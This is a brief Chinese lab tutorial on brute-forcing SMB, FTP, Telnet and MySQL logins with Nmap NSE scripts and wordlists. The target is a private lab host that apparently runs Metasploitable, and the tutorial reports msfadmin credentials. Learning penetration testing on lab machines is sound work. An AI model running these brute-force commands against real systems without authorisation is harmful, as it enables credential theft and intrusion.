首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:
nmap 192.168.30.128
可以看到,目标服务器开放了众多的服务端口!
下面我们来对其 SMB 服务进行一个简单爆破:
nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
可以看到用户名及密码均为 msfadmin !
爆破 FTP 服务密码及用户名:
nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
可以看到用户名及密码均为 msfadmin !
爆破 TELNET 服务用户名及密码:
nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
可以看到用户名及密码均为 msfadmin !
爆破 MYSQL 数据库用户名及密码:
nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
关于MYSQL的爆破,我分别在虚拟机和物理机下尝试均为成功。大致原因和我的网络环境或是软件本身有关,大家可以自己去尝试下!
转载请注明:即刻安全 » 关于Nmap的简单爆破